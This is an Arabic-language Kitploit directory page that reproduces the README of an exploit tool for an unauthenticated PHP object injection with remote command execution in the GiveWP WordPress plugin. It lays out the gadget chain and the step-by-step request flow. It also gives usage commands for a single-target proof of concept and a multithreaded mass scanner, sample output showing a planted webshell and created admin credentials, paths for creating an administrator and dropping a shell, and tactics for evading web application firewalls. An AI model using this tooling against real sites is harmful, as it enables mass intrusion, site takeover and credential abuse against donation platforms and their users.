Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-82222 — # GiveWP <= 4.16.7.1 حقن كائنات PHP غير مصادق عليه → تنفيذ أوامر عن بُعد | Kitploit
أدوات/GitHubGitHub/r0x19/cve-2026-82222
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubr0x19/cve-2026-82222

CVE-2026-82222

# GiveWP <= 4.16.7.1 حقن كائنات PHP غير مصادق عليه → تنفيذ أوامر عن بُعد

عرض المستودع
15منذ 20 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-82222 — GiveWP <= 4.16.7.1 حقن كائن PHP غير مصادق → تنفيذ أوامر عن بُعد

المؤلف: Rx019
CVSS: 10.0 (حرج)
النوع: حقن كائن PHP غير مصادق → تنفيذ أوامر عن بُعد
الإضافة: GiveWP (give) — إضافة التبرعات ومنصة جمع التبرعات
المتأثر: <= 4.16.7.1
تم التصحيح: 4.16.8


الوصف

يقوم GiveWP بتخزين last_name الخاص بالمتبرع في جلسة PHP دون تعقيم. عند تقديم تبرع بدون حقل give_last، يقوم GiveWP بإلغاء تسلسل القيمة الخام من قاعدة البيانات مباشرة إلى الجلسة. وهذا يسمح لمهاجم غير مصادق بحقن كائن PHP مُسلسل في last_name عبر نقطة نهاية ملف المتبرع، ثم تشغيل إلغاء التسلسل عن طريق تقديم تبرع مُصمم — مما يؤدي إلى تنفيذ أوامر عشوائية عبر سلسلة POP مُعدة مسبقًا متوفرة في مكتبات البائعين المرفقة مع GiveWP.


سلسلة POP

root@kitploit:~
TCPDF::__destruct()
  └─ Session::getBag()           ← يستدعي طريقة باسم $attributeName
       └─ DonationFactory::__call()
            └─ system($command)   ← $command من $attributeName

فئات البائعين المستخدمة:

الفئةالملف
TCPDFvendor/tecnickcom/tcpdf/tcpdf.php
Give\Vendors\Symfony\...\Sessionvendor/symfony/http-foundation/Session/Session.php
Give\TestData\Factories\DonationFactorysrc/TestData/Factories/DonationFactory.php

تدفق الاستغلال

root@kitploit:~
1. التسجيل كمتبرع         → جلسة مصادقة (ملف تعريف wp-login)
2. POST /wp-admin/profile.php
   last_name = سلسلة TCPDF مُسلسلة مع أمر system() مدمج
3. POST /wp-admin/admin-ajax.php
   action=give_process_donation  (حقل give_last محذوف)
   → يقرأ GiveWP last_name من قاعدة البيانات، ويكتب الكائن الخام في الجلسة
4. GET /?p={form_id}
   → إغلاق جلسة PHP يشغّل TCPDF::__destruct()
   → تنفذ سلسلة POP أمر system(command)
5. تأكيد القشرة / إنشاء مدير

المتطلبات

root@kitploit:~
pip install requests rich

Python >= 3.9


الملفات

الملفالوصف
CVE-2026-82222.pyإثبات مفهوم لهدف واحد — مخرجات تفصيلية خطوة بخطوة
CVE-2026-82222-MASS.pyماسح جماعي — وضع دفعات متعدد الخيوط

الاستخدام

هدف واحد

root@kitploit:~
python CVE-2026-82222.py

موجه تفاعلي:

root@kitploit:~
  Target URL: https://victim.com

أو مباشرة:

root@kitploit:~
python CVE-2026-82222.py https://victim.com

الماسح الجماعي

root@kitploit:~
# دفعة من ملف
python CVE-2026-82222-MASS.py -f targets.txt

# عدد خيوط مخصص
python CVE-2026-82222-MASS.py -f targets.txt -t 10

# أهداف متعددة مباشرة
python CVE-2026-82222-MASS.py https://site1.com https://site2.com

# قائمة تفاعلية
python CVE-2026-82222-MASS.py

تنسيق ملف الدفعة:

root@kitploit:~
# الأسطر التي تبدأ بـ # يتم تجاهلها
https://target1.com
https://target2.com
target3.com          # البروتوكول يُضاف تلقائيًا كـ https://
http://target4.com

المخرجات

الوضع الفردي

root@kitploit:~
╭─ CVE-2026-82222 | Rx019 ─────────────────────────────╮
│                                                        │
│  PWNED (shell + direct)  https://victim.com           │
│  Version : 4.15.0                                     │
│  WAF     : Wordfence                                   │
│  Shell   : https://victim.com/wp-content/uploads/...  │
│  Method  : shell + direct (no .php write needed)       │
│  Admin   : rxadm3f91:RxAdm!k2m9xp7 ([email protected]) │
│                                                        │
╰────────────────────────────────────────────────────────╯

ملخص الدفعة

root@kitploit:~
  Vulnerable : 12   Partial : 3   Patched : 44   Not Vuln : 21   Errors : 2   Total : 82

تُحفظ النتائج في ~/Documents/CVE/CVE-2026-82222/:

الملفالمحتويات
CVE-2026-82222_YYYYMMDD_HHMMSS.txtنتيجة تشغيل واحد
CVE-2026-82222_batch_YYYYMMDD_HHMMSS.txtنتائج الدفعة الكاملة
success_results.txtأسطر VULN/PARTIAL المُلحقة

مسارات الهجوم

يحاول الاستغلال مسارين رئيسيين بالتسلسل:

المسار أ — مدير مباشر (بدون كتابة ملف قشرة)

  1. حقن كود wp_create_user() PHP كـ base64 في سلسلة TCPDF
  2. تشغيل السلسلة — ينفذ GiveWP الكود على الخادم
  3. التحقق عن طريق تسجيل الدخول كمدير تم إنشاؤه
  4. إسقاط قشرة عبر محرر ملفات الإضافة/القالب في WordPress

المسار ب — إسقاط قشرة سلسلة GiveWP

يُستخدم عندما يفشل المسار أ أو يتعذر التحقق من تسجيل دخول المدير.

  1. تسجيل جلسة متبرع جديدة (ملف جلسة PHP جديد — يتجنب تعارض القفل من عامل المسار أ)
  2. حقن أمر إسقاط القشرة في last_name عبر نقطة نهاية الملف الشخصي
  3. تلويث الجلسة (تبرع بدون give_last)
  4. تشغيل إلغاء التسلسل (/?p={form_id})
  5. تأكيد وجود القشرة عبر أدلة الرفع/الإضافة/القالب
  6. خطة بديلة: إشارة id | tee إلى ملف .txt في uploads

المسار ج — مدير عبر القشرة

إذا تم تأكيد وجود قشرة ولكن لا يوجد مدير بعد، أنشئ واحدًا عبر القشرة باستخدام wp_create_user() من خلال معامل ?c= في القشرة.


التعامل مع جدار الحماية (WAF)

WAFالاستراتيجية
Imunify360إزالة ترويسات انتحال X-Forwarded-For / X-Real-IP
Wordfenceتدوير User-Agent من مجموعة
Cloudflareتعيين Accept-Encoding: gzip, deflate, br

ملاحظات

  • يتطلب الاستغلال وجود نموذج تبرع منشور واحد على الأقل في GiveWP
  • يجب تفعيل التسجيل على الموقع المستهدف (إعداد WordPress الأساسي)
  • تصريف تجمع عمال PHP-FPM: يتم إدراج نوم لمدة 30 ثانية بعد سلسلة المدير المباشر للسماح للعامل الذي يحمل الجلسة بالإفراج قبل الطلبات اللاحقة
  • DISALLOW_FILE_EDIT في wp-config.php يحظر متجه محرر الإضافة/القالب — يكتشف السكربت ذلك مبكرًا وينتقل إلى المسار ب
  • اسم ملف القشرة: Rx{100-999}.php — عشوائي لكل تشغيل

إخلاء مسؤولية

تم إصدار هذه الأداة لأغراض الاختبارات الأمنية والبحث المصرح بها فقط.
استخدمها فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
الاستخدام غير المصرح به غير قانوني وغير أخلاقي.

تنزيل الأداة